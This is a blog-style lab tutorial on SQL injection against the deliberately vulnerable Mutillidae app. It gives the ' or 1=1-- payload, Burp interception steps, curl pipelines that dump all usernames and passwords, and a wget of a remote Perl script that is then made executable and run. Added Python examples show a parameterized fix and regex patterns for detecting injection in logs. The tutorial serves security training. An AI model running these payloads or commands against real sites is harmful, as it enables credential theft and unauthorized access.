
OWASP Top 10 Web Hacking Final Lab 7 - SQL Injection, Burpsuite, cURL, Perl Parser

Written By Akademy on Thursday, November 21, 2013 | November 21, 2013

{ SQL Injection, Burpsuite, cURL, Perl Parser }

    OWASP Top 10 Web Hacking Final  Lab 7
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web application that provides a target for web-security enthusiasts.
  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)
  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.
Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Go To User Info Page
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 9. Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences
  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Settings... button
     
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configurations
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

Section 10. Configure Burpsuite Settings
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Proxies ---> Web Vulnerability Scanner --> burpsuite
  2. JRE Message
    • Instructions:
      1. Click OK
  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080
  4. Turn on intercept
    • Instructions:
      1. Click on the proxy tab
      2. Click on the intercept tab
      3. Verify the intercept button shows "intercept is off"

Section 11. SQL Injection: Obtain Userlist (Method #1)
  1. Obtain Userlist Without Password
    • Instructions:
      1. Place the following in the Name Textbox --> ' or 1=1--
        • Make sure you put a space after the "-- "
      2. Click the View Account Details Button
    • Note(FYI):
      • The string ' or 1=1--  placed in the below query means the following:
        • Search for a username that is either equal to nothing OR where 1 is equal to 1.  So, we created a condition that is always true (OR 1=1).  The "-- " string is a comment in SQL.  We used this trick to comment out the rest of the SQL query (AND password=''), which eliminates the password check.
      • SELECT * FROM accounts WHERE username='' or 1=1-- ' AND password=''
  2. View Results
    • Note(FYI):
      1. Notice the SQL injection returns all the usernames and their passwords.
      2. Notice the weird URL string '+or+1%3D1--+
        • + is a space
        • %3D is an equal sign (=)
        • Thus--> ' or 1=1--
      3. http://192.168.1.111/mutillidae/index.php?page=user-info.php&username='+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
        • What do you want to bet, we can later use the above URL string to obtain the same username and password information without using a web browser?
  3. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Click on the line that contains --> /mutillidae/index.php?page=user-info.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. View the GET Data String
        • Later we will populate curl with this URL string.
    • Note(FYI):
      • /mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
      • The encoded sql injection --> %27+or+1%3D1--+
        1. %27 is a single quote (')
        2. + is a space
        3. %3D is an equal sign (=)
      • The difference between this step and the previous step is that Burpsuite encoded the single quote (') as %27.
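The query rewrite described in Section 11, as an added example that is not part of the original lab: it decodes the request string captured in Burp, shows that string concatenation produces exactly the query from Step 1, and shows that a parameterized query treats the same input as plain data. An in-memory SQLite table stands in for Mutillidae's database; the table rows and function names are constructed for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string as captured in Burp (Section 11, Step 3), copied from the lab.
RAW_QUERY = ("page=user-info.php&username=%27+or+1%3D1--+&password="
             "&user-info-php-submit-button=View+Account+Details")


def make_db():
    """Build an in-memory stand-in for the accounts table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [("alice", "constructed-pw-1"), ("bob", "constructed-pw-2")])
    return db


def decode_params(raw_query):
    """URL-decode the request: %27 -> ', + -> space, %3D -> =."""
    fields = parse_qs(raw_query, keep_blank_values=True)
    return fields["username"][0], fields["password"][0]


def lookup_vulnerable(db, username, password):
    """String concatenation: the input becomes part of the SQL text."""
    sql = ("SELECT * FROM accounts WHERE username='" + username +
           "' AND password='" + password + "'")
    return sql, db.execute(sql).fetchall()


def lookup_parameterized(db, username, password):
    """Placeholders: the input is bound as data and never parsed as SQL."""
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    user, pw = decode_params(RAW_QUERY)
    sql, rows = lookup_vulnerable(db, user, pw)
    print("decoded username:", repr(user))
    print("vulnerable SQL  :", sql)
    print("vulnerable rows :", rows)
    print("bound rows      :", lookup_parameterized(db, user, pw))
```
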
Section 12. Simulate CURL SQL Injection: (Method #2)
  1. Use Curl to Display Usernames and Passwords
    • Note(FYI):
      • I apologize ahead of time for the below mess.  Match up the colors with the explanations.
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep -i "Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}' | awk -F\> '{print $2}'
    • Note(FYI):
      1. --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details"
        • This is the URL POST DATA string we obtained from (Section 11, Step 3) or (Section 11, Step 2).
      2. --location "http://192.168.1.111/mutillidae/index.php"
        • --location tells curl to follow any redirects; the URL is the actual webpage script that handles the common gateway interface (CGI) between the web browser and server.
      3. awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}'
        • Use the "<" character as a delimiter or field separator and print each array element on a separate line
      4. grep -i "Username="
        • Display lines that only have the string "Username=".  Remember that the web output from (Section 11, Step 2) contained "Username="
      5. awk -F\> '{print $2}'
        • Use ">" as a delimiter and only print the output from the second field.

Section 13. Perl Parser
  1. Create Output File
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. cd /root
      2. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep "Username=" > lesson7.txt
      3. cat lesson7.txt
  2. Download Output Parser
    • Instructions:
      1. cd /root
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson7/lesson7.pl.TXT
      3. mv lesson7.pl.TXT lesson7.pl
      4. chmod 700 lesson7.pl
  3. Run Perl Script
    • Instructions:
      1. ./lesson7.pl
    • Note(FYI):
      • So let's put the pieces together. Imagine a web crawler that does nothing but curl webpages for the string "form".  If the string "form" is found, then try a simple SQL injection like (' or 1=1-- ).  Pretty scary stuff.
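Seen from the server side, automated requests like the ones above leave a recognizable trace. The following added example (not part of the original lab) URL-decodes each query parameter in a web access log and flags values that close a string literal and then add an always-true OR or a trailing "-- " comment. The log lines, client address and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines. Lines 2 and 3 carry the lab's payload as Burp
# encoded it (%27) and as Firefox sent it (raw quote); line 4 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Nov/2013:10:00:01 +0000] "GET /mutillidae/index.php?page=user-info.php&username=alice&password=x HTTP/1.1" 200 5120
10.0.0.5 - - [21/Nov/2013:10:00:09 +0000] "GET /mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1--+&password= HTTP/1.1" 200 48213
10.0.0.5 - - [21/Nov/2013:10:00:12 +0000] "GET /mutillidae/index.php?page=user-info.php&username='+or+1%3D1--+&password= HTTP/1.1" 200 48213
10.0.0.5 - - [21/Nov/2013:10:00:15 +0000] "GET /mutillidae/index.php?page=home.php&q=it%27s+fine HTTP/1.1" 200 3301
""".splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A quote that closes the string literal, then OR with a self-comparison (1=1).
TAUTOLOGY_RE = re.compile(r"'\s*or\s+(\w+)\s*=\s*\1\b", re.IGNORECASE)
# A quote followed later by a "-- " comment that cuts off the rest of the query.
COMMENT_RE = re.compile(r"'.*--(?:\s|$)")


def flag_sqli(log_lines):
    """Return (line_number, parameter, decoded_value) for suspicious values."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl decodes %27, %3D and + so both encodings compare equal.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if TAUTOLOGY_RE.search(value) or COMMENT_RE.search(value):
                hits.append((number, name, value))
    return hits


if __name__ == "__main__":
    for number, name, value in flag_sqli(SAMPLE_LOG):
        print(f"line {number}: parameter {name!r} decoded to {value!r}")
```

The curl command in Section 12 sends the same fields with --data, that is, in a POST body, which a default access log does not record. Catching that form needs request-body logging or an inspecting proxy in front of the application.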

Section 14. Restore Firefox Original Proxy Configurations
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If the Firefox icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Firefox Preferences
    • Instructions:
      1. Edit --> Preferences
  3. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Settings... button
  4. Connection Settings
    • Instructions:
      1. Click on the No proxy radio button
      2. Click on the OK button
      3. Click on the Close button

Section 15. Proof of Lab
  1. Proof of Lab: Record the entire process you carried out.